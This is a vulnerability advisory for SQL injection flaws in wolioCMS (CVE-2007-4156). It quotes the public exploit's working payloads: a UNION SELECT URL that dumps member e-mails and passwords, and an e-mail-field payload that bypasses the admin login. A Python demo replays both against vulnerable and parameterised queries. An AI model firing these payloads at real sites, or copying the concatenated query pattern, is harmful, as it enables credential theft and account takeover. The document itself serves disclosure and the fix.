WolioCMS Multiple SQL Injection Vulnerabilities

Vulnerability ID 1113402 Type SQL injection
Published 2007-07-30 Updated 2007-08-06
CVE CVE-2007-4156 CNNVD-ID CNNVD-200708-018
Platform PHP CVSS score 7.5
|Source
https://www.exploit-db.com/exploits/4246
https://cxsecurity.com/issue/WLB-2007080024
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-018
|Details
wolioCMS contains multiple SQL injection vulnerabilities. A remote attacker can execute arbitrary SQL statements via (1) the id parameter to member.php in a page action (act=page), which common.php concatenates unescaped into a SELECT on the pages table; (2) the loginid parameter (the uid variable) of admin/index.php, which is concatenated into the login SELECT on the member table; and possibly (3) the pwd parameter to admin/index.php, which is concatenated into the same query. Because the login code treats any returned row as a successful login, injection (2) allows the administrator login to be bypassed without a password, and injection (1) allows member e-mail addresses and stored passwords to be read through a UNION SELECT. The public exploit below requires magic_quotes_gpc = off; since magic_quotes_gpc was removed in PHP 5.4, it cannot be relied on as a mitigation, and the fix is to pass id, uid and pwd to the database as bound parameters (or, at minimum, escape them with the driver's escaping function) instead of building the query string by concatenation.
|Exploit
########################################################################
# wolioCMS - SQL Injection and Bypass Administrator Login
# Vendor        : http://www.buton.web.id/member.php?member=anon
# Download      : http://www.buton.web.id/download/woliocms.zip
# Found By      : k1tk4t - k1tk4t[4t]newhack.org
# Location      : Indonesia   --  #newhack[dot]org @irc.dal.net
########################################################################
This exploit succeeds if 'magic_quotes_gpc = off'
########################################################################
file;
/common.php
bug at line 73;
$sql="select * from pages where pages_id='".$_GET["id"]."' ";
----
/admin/index.php
bug at line 28;
$sql="select * from member where member_email='$uid' and member_password='$pwd' and member_active='yes' ";
The variable $uid is not properly filtered, so it can be manipulated by the user
########################################################################
exploit;
SQL Injection
http://localhost/_woliocms/member.php?member=admin&act=page&id='/**/UNION/**/ALL/**/SELECT/**/null,null,concat(member_email,'-',member_password),null,null,null,null,null,null,null/**/FROM/**/member/*
----
Bypass Administrator Login
http://localhost/_woliocms/admin/
Login Page
Email;
'/**/UNION/**/ALL/**/SELECT/**/member_id,member_email,member_password,member_realname,member_urlname,member_themes,member_groups_id,member_register_date,member_active,member_activation_code/**/FROM/**/member/*
Password;
Blank [just click login]
########################################################################
Thanks;
str0ke
xoron [www.xoron.biz]
y3dips [y3d1ps.blogspot.com]
-newhack[dot]org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
all members of newhack[dot]org
-----------------------
all members of echo.or.id
-----------------------
not forgetting anavrin [keep up the good work, bro], and ical, who has just recovered

# milw0rm.com [2007-07-30]
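As an added worked example (not part of the advisory or of the wolioCMS code base), the following Python script reproduces the two injections from the exploit above against an in-memory SQLite database and places the parameterised form of each query beside the vulnerable one. Assumptions: SQLite stands in for MySQL, so the advisory's concat() is rewritten with the || operator (the /**/ spacing and the trailing unterminated /* behave the same in both engines); the member table has exactly the ten columns named in the login-bypass payload; the pages table is constructed with ten columns (invented names c4 to c10) so that it matches the ten SELECT slots of the member.php payload; the sample rows are constructed and say nothing about how wolioCMS really stores passwords.

```python
import sqlite3

# Payloads copied from the advisory, with MySQL concat() replaced by || for SQLite.
PAGE_PAYLOAD = (
    "'/**/UNION/**/ALL/**/SELECT/**/null,null,member_email||'-'||member_password,"
    "null,null,null,null,null,null,null/**/FROM/**/member/*"
)
LOGIN_PAYLOAD = (
    "'/**/UNION/**/ALL/**/SELECT/**/member_id,member_email,member_password,"
    "member_realname,member_urlname,member_themes,member_groups_id,"
    "member_register_date,member_active,member_activation_code/**/FROM/**/member/*"
)

ADMIN_EMAIL = "admin@example.invalid"         # constructed sample data
ADMIN_PASSWORD = "constructed-stored-secret"  # constructed; storage format is an assumption


def build_db():
    """In-memory stand-in for the two tables the advisory touches (constructed schema)."""
    conn = sqlite3.connect(":memory:")
    # Column list taken from the login-bypass payload in the advisory.
    conn.execute(
        "CREATE TABLE member (member_id INTEGER, member_email TEXT, member_password TEXT,"
        " member_realname TEXT, member_urlname TEXT, member_themes TEXT, member_groups_id INTEGER,"
        " member_register_date TEXT, member_active TEXT, member_activation_code TEXT)"
    )
    conn.execute(
        "INSERT INTO member VALUES (1, ?, ?, 'Admin', 'admin', 'default', 1, '2007-01-01', 'yes', '')",
        (ADMIN_EMAIL, ADMIN_PASSWORD),
    )
    # Ten columns so the UNION in PAGE_PAYLOAD lines up; names after pages_id are invented.
    conn.execute(
        "CREATE TABLE pages (pages_id TEXT, pages_title TEXT, pages_content TEXT,"
        " c4, c5, c6, c7, c8, c9, c10)"
    )
    conn.execute(
        "INSERT INTO pages VALUES ('about', 'About', 'Welcome', NULL, NULL, NULL, NULL, NULL, NULL, NULL)"
    )
    return conn


def vulnerable_page_lookup(conn, page_id):
    """Mirrors common.php line 73: the id parameter is pasted straight into the SQL string."""
    sql = "select * from pages where pages_id='" + page_id + "' "
    return conn.execute(sql).fetchall()


def vulnerable_login(conn, uid, pwd):
    """Mirrors admin/index.php line 28: any row coming back is treated as a valid login."""
    sql = (
        "select * from member where member_email='" + uid
        + "' and member_password='" + pwd + "' and member_active='yes' "
    )
    return conn.execute(sql).fetchone()


def safe_page_lookup(conn, page_id):
    """Hardened form: a bound parameter keeps the quote and the UNION inside the value."""
    return conn.execute("select * from pages where pages_id=?", (page_id,)).fetchall()


def safe_login(conn, uid, pwd):
    """Hardened form of the login query; both user-controlled values are bound."""
    return conn.execute(
        "select * from member where member_email=? and member_password=? and member_active='yes'",
        (uid, pwd),
    ).fetchone()


if __name__ == "__main__":
    db = build_db()
    # (1) Exfiltration through member.php: pages_id='' matches nothing, so the only row
    # is the UNIONed one, whose third column (where the page body would be rendered)
    # carries email-password.
    print("leaked via id:", vulnerable_page_lookup(db, PAGE_PAYLOAD)[0][2])
    # (2) Admin login bypass: the WHERE clause yields nothing, the UNION half returns
    # every member, and the first row (the admin) becomes the logged-in user.
    print("logged in as:", vulnerable_login(db, LOGIN_PAYLOAD, "")[1])
    # The same payloads against the parameterised queries match no row at all.
    print("hardened page rows:", len(safe_page_lookup(db, PAGE_PAYLOAD)))
    print("hardened login:", safe_login(db, LOGIN_PAYLOAD, ""))
```

The trailing /* in each payload is what lets the attacker drop the rest of the original WHERE clause (the closing quote, the password check and member_active='yes') without a syntax error, which is why the password field can be left blank in the login bypass.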
|References

XF: woliocms-member-sql-injection (35678), http://xforce.iss.net/xforce/xfdb/35678
BID: 25134, http://www.securityfocus.com/bid/25134
BUGTRAQ: 20070730 wolioCMS SQL Injection, http://www.securityfocus.com/archive/1/archive/1/475068/100/0/threaded
MILW0RM: 4246, http://www.milw0rm.com/exploits/4246
SECUNIA: 26270, http://secunia.com/advisories/26270
VUPEN: ADV-2007-2726, http://www.frsirt.com/english/advisories/2007/2726
SREASON: 2956, http://securityreason.com/securityalert/2956